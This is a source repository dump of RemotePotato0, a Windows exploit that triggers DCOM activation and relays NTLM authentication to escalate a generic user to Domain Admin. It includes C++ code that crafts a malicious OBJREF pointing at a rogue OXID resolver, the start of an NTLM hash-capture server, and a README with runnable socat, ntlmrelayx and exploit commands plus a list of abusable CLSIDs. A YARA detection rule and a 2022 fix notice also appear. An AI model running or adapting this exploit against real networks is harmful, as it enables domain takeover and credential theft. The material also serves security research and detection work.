    ( (This)->lpVtbl -> Reset(This) )

#endif /* COBJMACROS */


#endif /* C style interface */




#endif /* __IStandardActivator_INTERFACE_DEFINED__ */


#ifndef __ISpecialSystemProperties_INTERFACE_DEFINED__
#define __ISpecialSystemProperties_INTERFACE_DEFINED__

/* interface ISpecialSystemProperties */
/* [unique][uuid][local][object] */


EXTERN_C const IID IID_ISpecialSystemProperties;

#if defined(__cplusplus) && !defined(CINTERFACE)

    MIDL_INTERFACE("000001b9-0000-0000-C000-000000000046")
    ISpecialSystemProperties : public IUnknown
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE SetSessionId(
            /* [in] */ ULONG dwSessionId,
            /* [in] */ BOOL bUseConsole,
            /* [in] */ BOOL fRemoteThisSessionId) = 0;

        virtual HRESULT STDMETHODCALLTYPE GetSessionId(
            /* [out] */ ULONG *pdwSessionId,
            /* [out] */ BOOL *pbUseConsole) = 0;

        virtual HRESULT STDMETHODCALLTYPE GetSessionId2(
            /* [out] */ ULONG *pdwSessionId,
            /* [out] */ BOOL *pbUseConsole,
            /* [out] */ BOOL *pfRemoteThisSessionId) = 0;

        virtual HRESULT STDMETHODCALLTYPE SetClientImpersonating(
            /* [in] */ BOOL fClientImpersonating) = 0;

        virtual HRESULT STDMETHODCALLTYPE GetClientImpersonating(
            /* [out] */ BOOL *pfClientImpersonating) = 0;

        virtual HRESULT STDMETHODCALLTYPE SetPartitionId(
            /* [in] */ REFGUID guidPartiton) = 0;

        virtual HRESULT STDMETHODCALLTYPE GetPartitionId(
            /* [out] */ GUID *pguidPartiton) = 0;

        virtual HRESULT STDMETHODCALLTYPE SetProcessRequestType(
            /* [in] */ DWORD dwPRT) = 0;

        virtual HRESULT STDMETHODCALLTYPE GetProcessRequestType(
            /* [out] */ DWORD *pdwPRT) = 0;

        virtual HRESULT STDMETHODCALLTYPE SetOrigClsctx(
            /* [in] */ DWORD dwClsctx) = 0;

        virtual HRESULT STDMETHODCALLTYPE GetOrigClsctx(
            /* [out] */ DWORD *dwClsctx) = 0;

        virtual HRESULT STDMETHODCALLTYPE GetDefaultAuthenticationLevel(
            /* [out] */ DWORD *pdwAuthnLevel) = 0;

        virtual HRESULT STDMETHODCALLTYPE SetDefaultAuthenticationLevel(
            /* [in] */ DWORD dwAuthnLevel) = 0;

    };


#else /* C style interface */

    typedef struct ISpecialSystemPropertiesVtbl
    {
        BEGIN_INTERFACE

        HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
            ISpecialSystemProperties * This,
            /* [in] */ REFIID riid,
            /* [annotation][iid_is][out] */
            _COM_Outptr_ void **ppvObject);

        ULONG ( STDMETHODCALLTYPE *AddRef )(
            ISpecialSystemProperties * This);

        ULONG ( STDMETHODCALLTYPE *Release )(
            ISpecialSystemProperties * This);

        HRESULT ( STDMETHODCALLTYPE *SetSessionId )(
            ISpecialSystemProperties * This,
            /* [in] */ ULONG dwSessionId,
            /* [in] */ BOOL bUseConsole,
            /* [in] */ BOOL fRemoteThisSessionId);

        HRESULT ( STDMETHODCALLTYPE *GetSessionId )(
            ISpecialSystemProperties * This,
            /* [out] */ ULONG *pdwSessionId,
            /* [out] */ BOOL *pbUseConsole);

        HRESULT ( STDMETHODCALLTYPE *GetSessionId2 )(
            ISpecialSystemProperties * This,
            /* [out] */ ULONG *pdwSessionId,
            /* [out] */ BOOL *pbUseConsole,
            /* [out] */ BOOL *pfRemoteThisSessionId);

        HRESULT ( STDMETHODCALLTYPE *SetClientImpersonating )(
ISpecialSystemProperties * This, 331 | /* [in] */ BOOL fClientImpersonating); 332 | 333 | HRESULT ( STDMETHODCALLTYPE *GetClientImpersonating )( 334 | ISpecialSystemProperties * This, 335 | /* [out] */ BOOL *pfClientImpersonating); 336 | 337 | HRESULT ( STDMETHODCALLTYPE *SetPartitionId )( 338 | ISpecialSystemProperties * This, 339 | /* [in] */ REFGUID guidPartiton); 340 | 341 | HRESULT ( STDMETHODCALLTYPE *GetPartitionId )( 342 | ISpecialSystemProperties * This, 343 | /* [out] */ GUID *pguidPartiton); 344 | 345 | HRESULT ( STDMETHODCALLTYPE *SetProcessRequestType )( 346 | ISpecialSystemProperties * This, 347 | /* [in] */ DWORD dwPRT); 348 | 349 | HRESULT ( STDMETHODCALLTYPE *GetProcessRequestType )( 350 | ISpecialSystemProperties * This, 351 | /* [out] */ DWORD *pdwPRT); 352 | 353 | HRESULT ( STDMETHODCALLTYPE *SetOrigClsctx )( 354 | ISpecialSystemProperties * This, 355 | /* [in] */ DWORD dwClsctx); 356 | 357 | HRESULT ( STDMETHODCALLTYPE *GetOrigClsctx )( 358 | ISpecialSystemProperties * This, 359 | /* [out] */ DWORD *dwClsctx); 360 | 361 | HRESULT ( STDMETHODCALLTYPE *GetDefaultAuthenticationLevel )( 362 | ISpecialSystemProperties * This, 363 | /* [out] */ DWORD *pdwAuthnLevel); 364 | 365 | HRESULT ( STDMETHODCALLTYPE *SetDefaultAuthenticationLevel )( 366 | ISpecialSystemProperties * This, 367 | /* [in] */ DWORD dwAuthnLevel); 368 | 369 | END_INTERFACE 370 | } ISpecialSystemPropertiesVtbl; 371 | 372 | interface ISpecialSystemProperties 373 | { 374 | CONST_VTBL struct ISpecialSystemPropertiesVtbl *lpVtbl; 375 | }; 376 | 377 | 378 | 379 | #ifdef COBJMACROS 380 | 381 | 382 | #define ISpecialSystemProperties_QueryInterface(This,riid,ppvObject) \ 383 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 384 | 385 | #define ISpecialSystemProperties_AddRef(This) \ 386 | ( (This)->lpVtbl -> AddRef(This) ) 387 | 388 | #define ISpecialSystemProperties_Release(This) \ 389 | ( (This)->lpVtbl -> Release(This) ) 390 | 391 | 392 | #define 
ISpecialSystemProperties_SetSessionId(This,dwSessionId,bUseConsole,fRemoteThisSessionId) \ 393 | ( (This)->lpVtbl -> SetSessionId(This,dwSessionId,bUseConsole,fRemoteThisSessionId) ) 394 | 395 | #define ISpecialSystemProperties_GetSessionId(This,pdwSessionId,pbUseConsole) \ 396 | ( (This)->lpVtbl -> GetSessionId(This,pdwSessionId,pbUseConsole) ) 397 | 398 | #define ISpecialSystemProperties_GetSessionId2(This,pdwSessionId,pbUseConsole,pfRemoteThisSessionId) \ 399 | ( (This)->lpVtbl -> GetSessionId2(This,pdwSessionId,pbUseConsole,pfRemoteThisSessionId) ) 400 | 401 | #define ISpecialSystemProperties_SetClientImpersonating(This,fClientImpersonating) \ 402 | ( (This)->lpVtbl -> SetClientImpersonating(This,fClientImpersonating) ) 403 | 404 | #define ISpecialSystemProperties_GetClientImpersonating(This,pfClientImpersonating) \ 405 | ( (This)->lpVtbl -> GetClientImpersonating(This,pfClientImpersonating) ) 406 | 407 | #define ISpecialSystemProperties_SetPartitionId(This,guidPartiton) \ 408 | ( (This)->lpVtbl -> SetPartitionId(This,guidPartiton) ) 409 | 410 | #define ISpecialSystemProperties_GetPartitionId(This,pguidPartiton) \ 411 | ( (This)->lpVtbl -> GetPartitionId(This,pguidPartiton) ) 412 | 413 | #define ISpecialSystemProperties_SetProcessRequestType(This,dwPRT) \ 414 | ( (This)->lpVtbl -> SetProcessRequestType(This,dwPRT) ) 415 | 416 | #define ISpecialSystemProperties_GetProcessRequestType(This,pdwPRT) \ 417 | ( (This)->lpVtbl -> GetProcessRequestType(This,pdwPRT) ) 418 | 419 | #define ISpecialSystemProperties_SetOrigClsctx(This,dwClsctx) \ 420 | ( (This)->lpVtbl -> SetOrigClsctx(This,dwClsctx) ) 421 | 422 | #define ISpecialSystemProperties_GetOrigClsctx(This,dwClsctx) \ 423 | ( (This)->lpVtbl -> GetOrigClsctx(This,dwClsctx) ) 424 | 425 | #define ISpecialSystemProperties_GetDefaultAuthenticationLevel(This,pdwAuthnLevel) \ 426 | ( (This)->lpVtbl -> GetDefaultAuthenticationLevel(This,pdwAuthnLevel) ) 427 | 428 | #define 
ISpecialSystemProperties_SetDefaultAuthenticationLevel(This,dwAuthnLevel) \ 429 | ( (This)->lpVtbl -> SetDefaultAuthenticationLevel(This,dwAuthnLevel) ) 430 | 431 | #endif /* COBJMACROS */ 432 | 433 | 434 | #endif /* C style interface */ 435 | 436 | 437 | 438 | 439 | #endif /* __ISpecialSystemProperties_INTERFACE_DEFINED__ */ 440 | 441 | 442 | /* Additional Prototypes for ALL interfaces */ 443 | 444 | /* end of Additional Prototypes */ 445 | 446 | #ifdef __cplusplus 447 | } 448 | #endif 449 | 450 | #endif 451 | 452 | 453 | -------------------------------------------------------------------------------- /IStorageTrigger.cpp: -------------------------------------------------------------------------------- 1 | #include "IStorageTrigger.h" 2 | #include 3 | #include 4 | #include 5 | 6 | #pragma warning(disable : 4996) //_CRT_SECURE_NO_WARNINGS 7 | 8 | extern wchar_t* rogueOxidResolverIp; 9 | extern wchar_t* rogueOxidResolverPort; 10 | extern bool juicyPotatoCompatible; 11 | 12 | void GenRandomByte(byte* s, int len) 13 | { 14 | 15 | int k; 16 | srand((unsigned int)time(NULL)); 17 | for (int i = 0; i < len; ++i) { 18 | k = 1 + (rand() % static_cast(255 - 1 + 1)); 19 | s[i] = k; 20 | //printf("k=%d\n", k); 21 | } 22 | 23 | 24 | } 25 | IStorageTrigger::IStorageTrigger(IStorage* istg) { 26 | _stg = istg; 27 | m_cRef = 1; 28 | return; 29 | } 30 | 31 | HRESULT IStorageTrigger::DisconnectObject(DWORD dwReserved) { 32 | return 0; 33 | } 34 | 35 | HRESULT IStorageTrigger::GetMarshalSizeMax(const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags, DWORD* pSize) { 36 | *pSize = 1024; 37 | //printf("IStorageTrigger GetMarshalSizeMax\n"); 38 | return 0; 39 | } 40 | 41 | HRESULT IStorageTrigger::GetUnmarshalClass(const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags, CLSID* pCid) { 42 | CLSIDFromString(OLESTR("{00000306-0000-0000-c000-000000000046}"), pCid); 43 | //printf("IStorageTrigger GetUnmarshalClass\n"); 44 | return 0; 
45 | } 46 | 47 | HRESULT IStorageTrigger::MarshalInterface(IStream* pStm, const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags) { 48 | short sec_len = 8; 49 | char remote_ip_mb[256]; 50 | wchar_t templateRemoteBindings[] = L"%s[%s]"; 51 | wchar_t remoteBindings[256]; 52 | 53 | if (juicyPotatoCompatible) 54 | StringCchPrintfW(remoteBindings, 256, templateRemoteBindings, rogueOxidResolverIp, rogueOxidResolverPort); 55 | else 56 | StringCbCopyW(remoteBindings, 256, rogueOxidResolverIp); 57 | //printf("remoteBindings = %S\n", remoteBindings); 58 | wcstombs(remote_ip_mb, remoteBindings, 256); 59 | 60 | char* ipaddr = remote_ip_mb; 61 | unsigned short str_bindlen = (unsigned short)((strlen(ipaddr)) * 2) + 6; 62 | unsigned short total_length = (str_bindlen + sec_len) / 2; 63 | unsigned char sec_offset = str_bindlen / 2; 64 | 65 | byte data_0[] = { //OBJREF STANDARD 66 | 0x4d,0x45,0x4f,0x57, //MEOW 67 | 0x01,0x00,0x00,0x00, //FLAGS 68 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46, 69 | 0x00,0x00,0x00,0x00, //OBJREF STD FLAGS 70 | 0x01,0x00,0x00,0x00 //count 71 | //0x31,0x11,0xb2,0x3e,0x7c,0x05,0xcb,0x32,//OXID 72 | //0x31,0xff,0x38,0xe8,0xb2,0x32,0x32,0x36 73 | //0x17,0x34,0x00,0x00,0xb0,0x17,0x00,0x00,0xb2,0x58,0x99,0xe7,0x61,0xb3,0x1d,0xaa //IPID 74 | }; 75 | 76 | /*byte random_ipid[] = { 77 | 0x17,0x34,0x00,0x00,0xb0,0x17,0x00,0x00,0xb2,0x58,0x99,0xe7,0x61,0xb3,0x1d,0xaa //IPID 78 | };*/ 79 | 80 | byte random_ipid[32]; 81 | GenRandomByte(random_ipid, 32); 82 | byte* dataip; 83 | int len = (int)strlen(ipaddr) * 2; 84 | dataip = (byte*)malloc(len); 85 | for (int i = 0; i < len; i++) 86 | { 87 | if (i % 2) 88 | dataip[i] = *ipaddr++; 89 | else 90 | dataip[i] = 0; 91 | } 92 | 93 | byte data_4[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a, 0x00, 0xff, 94 | 0xff, 0x00, 0x00, 0x00, 0x00 95 | }; 96 | 97 | byte data_1[4]; 98 | data_1[0] = (byte)total_length; 99 | data_1[1] = 0; 100 | data_1[2] = sec_offset; 101 | 
data_1[3] = 0; 102 | 103 | 104 | int size = sizeof(data_0) + sizeof(random_ipid) + sizeof(data_1) + len + 1 + sizeof(data_4); 105 | byte* marshalbuf = (byte*)malloc(size); 106 | int r = 0; 107 | memcpy(&marshalbuf[r], data_0, sizeof(data_0)); 108 | r = sizeof(data_0); 109 | memcpy(&marshalbuf[r], &random_ipid[0], sizeof(random_ipid)); 110 | r = r + sizeof(random_ipid); 111 | memcpy(&marshalbuf[r], data_1, sizeof(data_1)); 112 | r = r + sizeof(data_1); 113 | byte tmp1[] = { 0x07 }; 114 | memcpy(&marshalbuf[r], tmp1, 1); 115 | r = r + 1; 116 | memcpy(&marshalbuf[r], dataip, len); 117 | r = r + len; 118 | 119 | memcpy(&marshalbuf[r], data_4, sizeof(data_4)); 120 | 121 | ULONG written = 0; 122 | pStm->Write(&marshalbuf[0], size, &written); 123 | printf("[*] IStoragetrigger written: %d bytes\n", written); 124 | free(marshalbuf); 125 | free(dataip); 126 | return 0; 127 | } 128 | 129 | HRESULT IStorageTrigger::ReleaseMarshalData(IStream* pStm) { 130 | return 0; 131 | } 132 | HRESULT IStorageTrigger::UnmarshalInterface(IStream* pStm, const IID& riid, void** ppv) { 133 | *ppv = 0; 134 | return 0; 135 | } 136 | HRESULT IStorageTrigger::Commit(DWORD grfCommitFlags) { 137 | _stg->Commit(grfCommitFlags); 138 | return 0; 139 | } 140 | HRESULT IStorageTrigger::CopyTo(DWORD ciidExclude, const IID* rgiidExclude, SNB snbExclude, IStorage* pstgDest) { 141 | _stg->CopyTo(ciidExclude, rgiidExclude, snbExclude, pstgDest); 142 | return 0; 143 | } 144 | HRESULT IStorageTrigger::CreateStorage(const OLECHAR* pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStorage** ppstg) { 145 | _stg->CreateStorage(pwcsName, grfMode, reserved1, reserved2, ppstg); 146 | return 0; 147 | } 148 | HRESULT IStorageTrigger::CreateStream(const OLECHAR* pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStream** ppstm) { 149 | _stg->CreateStream(pwcsName, grfMode, reserved1, reserved2, ppstm); 150 | return 0; 151 | } 152 | HRESULT IStorageTrigger::DestroyElement(const OLECHAR* pwcsName) { 153 | 
_stg->DestroyElement(pwcsName); 154 | return 0; 155 | } 156 | HRESULT IStorageTrigger::EnumElements(DWORD reserved1, void* reserved2, DWORD reserved3, IEnumSTATSTG** ppenum) { 157 | _stg->EnumElements(reserved1, reserved2, reserved3, ppenum); 158 | return 0; 159 | } 160 | HRESULT IStorageTrigger::MoveElementTo(const OLECHAR* pwcsName, IStorage* pstgDest, const OLECHAR* pwcsNewName, DWORD grfFlags) { 161 | _stg->MoveElementTo(pwcsName, pstgDest, pwcsNewName, grfFlags); 162 | return 0; 163 | } 164 | HRESULT IStorageTrigger::OpenStorage(const OLECHAR* pwcsName, IStorage* pstgPriority, DWORD grfMode, SNB snbExclude, DWORD reserved, IStorage** ppstg) { 165 | _stg->OpenStorage(pwcsName, pstgPriority, grfMode, snbExclude, reserved, ppstg); 166 | return 0; 167 | } 168 | HRESULT IStorageTrigger::OpenStream(const OLECHAR* pwcsName, void* reserved1, DWORD grfMode, DWORD reserved2, IStream** ppstm) { 169 | _stg->OpenStream(pwcsName, reserved1, grfMode, reserved2, ppstm); 170 | return 0; 171 | } 172 | HRESULT IStorageTrigger::RenameElement(const OLECHAR* pwcsOldName, const OLECHAR* pwcsNewName) { 173 | return 0; 174 | } 175 | HRESULT IStorageTrigger::Revert() { 176 | return 0; 177 | } 178 | HRESULT IStorageTrigger::SetClass(const IID& clsid) { 179 | return 0; 180 | } 181 | HRESULT IStorageTrigger::SetElementTimes(const OLECHAR* pwcsName, const FILETIME* pctime, const FILETIME* patime, const FILETIME* pmtime) { 182 | return 0; 183 | } 184 | HRESULT IStorageTrigger::SetStateBits(DWORD grfStateBits, DWORD grfMask) { 185 | return 0; 186 | } 187 | HRESULT IStorageTrigger::Stat(STATSTG* pstatstg, DWORD grfStatFlag) { 188 | _stg->Stat(pstatstg, grfStatFlag); 189 | 190 | //Allocate from heap because apparently this will get freed in OLE32 191 | const wchar_t c_s[] = L"hello.stg"; 192 | 193 | wchar_t* s = (wchar_t*)CoTaskMemAlloc(sizeof(c_s)); 194 | wcscpy_s(s, sizeof(c_s), c_s); 195 | pstatstg[0].pwcsName = s; 196 | return 0; 197 | } 198 | 199 | ///////////////////////IUknown Interface 
200 | HRESULT IStorageTrigger::QueryInterface(const IID& riid, void** ppvObj) { 201 | // Always set out parameter to NULL, validating it first. 202 | if (!ppvObj) { 203 | //printf("QueryInterface INVALID\n"); 204 | return E_INVALIDARG; 205 | } 206 | if (riid == IID_IUnknown) 207 | { 208 | *ppvObj = static_cast(this); 209 | //reinterpret_cast(*ppvObj)->AddRef(); 210 | } 211 | else if (riid == IID_IStorage) 212 | { 213 | *ppvObj = static_cast(this); 214 | } 215 | else if (riid == IID_IMarshal) 216 | { 217 | *ppvObj = static_cast(this); 218 | } 219 | else 220 | { 221 | *ppvObj = NULL; 222 | //printf("QueryInterface NOINT\n"); 223 | return E_NOINTERFACE; 224 | } 225 | // Increment the reference count and return the pointer. 226 | 227 | return S_OK; 228 | 229 | } 230 | 231 | 232 | ULONG IStorageTrigger::AddRef() { 233 | m_cRef++; 234 | return m_cRef; 235 | } 236 | 237 | ULONG IStorageTrigger::Release() { 238 | // Decrement the object's internal counter. 239 | ULONG ulRefCount = m_cRef--; 240 | return ulRefCount; 241 | } 242 | -------------------------------------------------------------------------------- /IStorageTrigger.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Objidl.h" 3 | 4 | class IStorageTrigger : public IMarshal, public IStorage { 5 | private: 6 | IStorage* _stg; 7 | int m_cRef; 8 | public: 9 | IStorageTrigger(IStorage* stg); 10 | HRESULT STDMETHODCALLTYPE DisconnectObject(DWORD dwReserved); 11 | HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags, DWORD* pSize); 12 | HRESULT STDMETHODCALLTYPE GetUnmarshalClass(const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags, CLSID* pCid); 13 | HRESULT STDMETHODCALLTYPE MarshalInterface(IStream* pStm, const IID& riid, void* pv, DWORD dwDestContext, void* pvDestContext, DWORD mshlflags); 14 | HRESULT STDMETHODCALLTYPE ReleaseMarshalData(IStream* 
pStm); 15 | HRESULT STDMETHODCALLTYPE UnmarshalInterface(IStream* pStm, const IID& riid, void** ppv); 16 | HRESULT STDMETHODCALLTYPE Commit(DWORD grfCommitFlags); 17 | HRESULT STDMETHODCALLTYPE CopyTo(DWORD ciidExclude, const IID* rgiidExclude, SNB snbExclude, IStorage* pstgDest); 18 | HRESULT STDMETHODCALLTYPE CreateStorage(const OLECHAR* pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStorage** ppstg); 19 | HRESULT STDMETHODCALLTYPE CreateStream(const OLECHAR* pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStream** ppstm); 20 | HRESULT STDMETHODCALLTYPE DestroyElement(const OLECHAR* pwcsName); 21 | HRESULT STDMETHODCALLTYPE EnumElements(DWORD reserved1, void* reserved2, DWORD reserved3, IEnumSTATSTG** ppenum); 22 | HRESULT STDMETHODCALLTYPE MoveElementTo(const OLECHAR* pwcsName, IStorage* pstgDest, const OLECHAR* pwcsNewName, DWORD grfFlags); 23 | HRESULT STDMETHODCALLTYPE OpenStorage(const OLECHAR* pwcsName, IStorage* pstgPriority, DWORD grfMode, SNB snbExclude, DWORD reserved, IStorage** ppstg); 24 | HRESULT STDMETHODCALLTYPE OpenStream(const OLECHAR* pwcsName, void* reserved1, DWORD grfMode, DWORD reserved2, IStream** ppstm); 25 | HRESULT STDMETHODCALLTYPE RenameElement(const OLECHAR* pwcsOldName, const OLECHAR* pwcsNewName); 26 | HRESULT STDMETHODCALLTYPE Revert(); 27 | HRESULT STDMETHODCALLTYPE SetClass(const IID& clsid); 28 | HRESULT STDMETHODCALLTYPE SetElementTimes(const OLECHAR* pwcsName, const FILETIME* pctime, const FILETIME* patime, const FILETIME* pmtime); 29 | HRESULT STDMETHODCALLTYPE SetStateBits(DWORD grfStateBits, DWORD grfMask); 30 | HRESULT STDMETHODCALLTYPE Stat(STATSTG* pstatstg, DWORD grfStatFlag); 31 | 32 | HRESULT STDMETHODCALLTYPE QueryInterface(const IID& riid, void** ppvObject); 33 | ULONG STDMETHODCALLTYPE AddRef(); 34 | ULONG STDMETHODCALLTYPE Release(); 35 | }; -------------------------------------------------------------------------------- /LICENSE: 
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2021 antonioCoco

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# RemotePotato0

**UPDATE 21-10-2022: The main exploit scenario RPC->LDAP of RemotePotato0 has been fixed. More details at -->** https://twitter.com/splinter_code/status/1583555613950255104

Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.

RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.

Briefly:

It abuses the DCOM activation service and triggers an NTLM authentication of any user currently logged on to the target machine.
It is required that a privileged user is logged on to the same machine (e.g. a Domain Admin user).
Once the NTLM type1 is triggered, we set up a cross-protocol relay server that receives the privileged type1 message and relays it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can set up a further relay node (e.g. ntlmrelayx) or relay directly to a privileged resource.
RemotePotato0 also allows grabbing the NTLMv2 hashes of every user logged on to a machine.

## Examples

Attacker machine (10.0.0.20)

Victim machine (10.0.0.45)

Victim Domain Controller (10.0.0.10)

#### Module 0 - Rpc2Http cross protocol relay server + potato trigger

```
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 &
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user
```
**Note: if you are on Windows Server <= 2016 you can avoid the network redirector (socat) because the oxid resolution can be performed locally.**

```
query user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1
```

#### Module 1 - Rpc2Http cross protocol relay server
```
.\RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20
```

```
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm
```

#### Module 2 - Rpc capture (hash) server + potato trigger
```
query user
.\RemotePotato0.exe -m 2 -s 1
```

#### Module 3 - Rpc capture (hash) server
```
.\RemotePotato0.exe -m 3 -l 9997
```

```
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm
```
## Usage

```


    RemotePotato0
    @splinter_code & @decoder_it



    Mandatory args:
    -m module
        Allowed values:
        0 - Rpc2Http cross protocol relay server + potato trigger (default)
        1 - Rpc2Http cross protocol relay server
        2 - Rpc capture (hash) server + potato trigger
        3 - Rpc capture (hash) server


    Other args: (someone could be mandatory and/or optional based on the module you use)
    -r Remote HTTP relay server ip
    -t Remote HTTP relay server port (Default 80)
    -x Rogue Oxid Resolver ip (default 127.0.0.1)
    -p Rogue Oxid Resolver port (default 9999)
    -l RPC Relay server listening port (Default 9997)
    -s Session id for the Cross Session Activation attack (default disabled)
    -c CLSID (Default {5167B42F-C111-47A1-ACC4-8EABE61B0B54})
```


## Demo

### Cross session activation


### Hash Stealer


## CLSID List

A list of usable CLSIDs on various Windows versions:

Windows Server 2019
```
{0002DF02-0000-0000-C000-000000000046} - BrowserBroker Class
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4} - AuthBrokerUI
{5167B42F-C111-47A1-ACC4-8EABE61B0B54} - Easconsent.dll
{924DC564-16A6-42EB-929A-9A61FA7DA06F} - Authentication UI CredUI Out of Proc Helper for Non-AppContainer Clients
{934b410c-43e4-415e-9935-fbc081ba93a9} - UserInfoDialog
{BA441419-0B3F-4FB6-A903-D16CC14CCA44} - CLSID_LockScreenContentionFlyout
{c58ca859-80bc-48df-8f06-ffa94a405bff} - Picker Host
{f65817c8-dd85-4136-89f0-b9d12939f2c4} - IsolatedMessageDialogFactory
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} - SPPUIObjectInteractive Class
{f8842f8e-dafe-4b37-9d38-4e0714a61149} - CastServerInteractiveUser
```

Windows Server 2016
```
{924DC564-16A6-42EB-929A-9A61FA7DA06F}
{f65817c8-dd85-4136-89f0-b9d12939f2c4}
{BA441419-0B3F-4FB6-A903-D16CC14CCA44}
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4}
{934b410c-43e4-415e-9935-fbc081ba93a9}
{f8842f8e-dafe-4b37-9d38-4e0714a61149}
{0002DF02-0000-0000-C000-000000000046}
{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
{c58ca859-80bc-48df-8f06-ffa94a405bff}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
```

Windows Server 2008 R2
```
{FCC74B77-EC3E-4dd8-A80B-008A702075A9}
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
```


You can find a more complete list here --> http://ohpe.it/juicy-potato/CLSID/

## Detection

YARA rule to detect the RemotePotato0 binary:

```
rule SentinelOne_RemotePotato0_privesc {
    meta:
        author = "SentinelOne"
        description = "Detects RemotePotato0 binary"
        reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"

    strings:
        $import1 = "CoGetInstanceFromIStorage"
        $istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
        $meow_header = { 4d 45 4f 57 }
        $clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii
        $clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii

    condition:
        (uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*)
}
```

## Authors

* [Antonio Cocomazzi](https://twitter.com/splinter_code)
* [Andrea Pierini](https://twitter.com/decoder_it)

## Credits

* [Impacket](https://github.com/SecureAuthCorp/impacket)
* [@tiraniddo](https://twitter.com/tiraniddo) - [Cross Session Activation](https://www.tiraniddo.dev/2021/04/standard-activating-yourself-to.html)
* [@Responder](https://github.com/lgandx/Responder)

## References
- https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop/
- https://www.tiraniddo.dev/2021/04/standard-activating-yourself-to.html

--------------------------------------------------------------------------------
/RPCCaptureServer.cpp:
-------------------------------------------------------------------------------- 1 | #define SECURITY_WIN32 2 | #define WIN32_LEAN_AND_MEAN 3 | 4 | #include "Windows.h" 5 | #include "stdio.h" 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include "RPCCaptureServer.h" 12 | #include "RelayLib.h" 13 | 14 | #pragma comment (lib, "Ws2_32.lib") 15 | #pragma comment (lib, "Secur32.Lib") 16 | 17 | #pragma warning(disable : 4996) //_CRT_SECURE_NO_WARNINGS 18 | 19 | #define DEFAULT_BUFLEN 8192 20 | 21 | #define NTLMv2_TYPE2_SERVER_CHALLENGE_LENGTH 8 22 | #define NTLMv2_TYPE2_SERVER_CHALLENGE_OFFSET 24 23 | #define NTLMv2_TYPE2_RESERVED_OFFSET 32 24 | #define NTLMv2_TYPE3_NTPROOFSTR_LENGTH 16 25 | #define NTLMv2_TYPE3_RESPONSE_LENGTH_OFFSET 20 26 | #define NTLMv2_TYPE3_RESPONSE_OFFSET_OFFSET 24 27 | 28 | extern BOOL g_SuccessTrigger; 29 | 30 | void DoRpcServerCaptureCredsHash(wchar_t* rpcServerIp, wchar_t* rpcServerPort, wchar_t* rpcRelayServerListeningPort) { 31 | int iResult = 0; 32 | int ntlmIndex = 0; 33 | int recvbuflen = DEFAULT_BUFLEN; 34 | int sendbuflen = DEFAULT_BUFLEN; 35 | char sendbuf[DEFAULT_BUFLEN]; 36 | char recvbuf[DEFAULT_BUFLEN]; 37 | char ntlmType1[DEFAULT_BUFLEN]; 38 | char ntlmType2[DEFAULT_BUFLEN]; 39 | int ntlmType2Len = 0; 40 | char ntlmType3[DEFAULT_BUFLEN]; 41 | int ntlmType3Len = 0; 42 | char type1BakBuffer[DEFAULT_BUFLEN]; 43 